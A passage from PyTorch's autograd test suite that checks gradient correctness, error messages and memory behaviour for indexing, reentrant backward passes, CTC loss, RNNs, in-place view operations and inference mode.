if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph, CPU part.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child GPU graph (much longer than the parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent graph, GPU part.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since the child graph will stop execution
# after the parent receives the error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
before = CudaMemoryLeakCheck.get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for the autograd thread to clean up failed tasks.
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = CudaMemoryLeakCheck.get_cuda_memory_usage()
self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
# TODO: opinfo pdist
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
batch_size = 64
num_labels = 101
target_length = 15
gradcheck_input_size = 10
ZERO_NONE = 0
ZERO_SOME = 1
ZERO_ALL = 2
# (input_length, vary_lengths, zero_mode)
tests = [(150, False, ZERO_NONE),
(150, True, ZERO_NONE),
(50, True, ZERO_SOME),
(50, True, ZERO_ALL)]
if 'cuda' in device:
tests += [(50, False, ZERO_NONE),
(50, True, ZERO_NONE),
(150, True, ZERO_SOME),
(150, True, ZERO_ALL)]
for input_length, vary_lengths, zero_mode in tests:
targets = torch.randint(1, num_labels, (batch_size, target_length),
device=device, dtype=torch.long)
x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
device=device)
input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
if zero_mode == ZERO_ALL:
target_lengths = [0 for _ in range(batch_size)]
else:
target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
if vary_lengths else target_length) for _ in range(batch_size)]
if zero_mode == ZERO_SOME:
idxes = torch.randint(0, batch_size, (10,))
for i in idxes:
target_lengths[i] = 0
def ctc_after_softmax(x):
x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
.view(input_length, batch_size, num_labels))
log_probs = torch.log_softmax(x_full, 2)
return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)
gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither
# (x + 2) nor ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
# checks that undefined gradients don't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml;
# there was a bug where bfloat16 was not recognized as floating point.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishes on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishes on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastable shapes and scalars.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
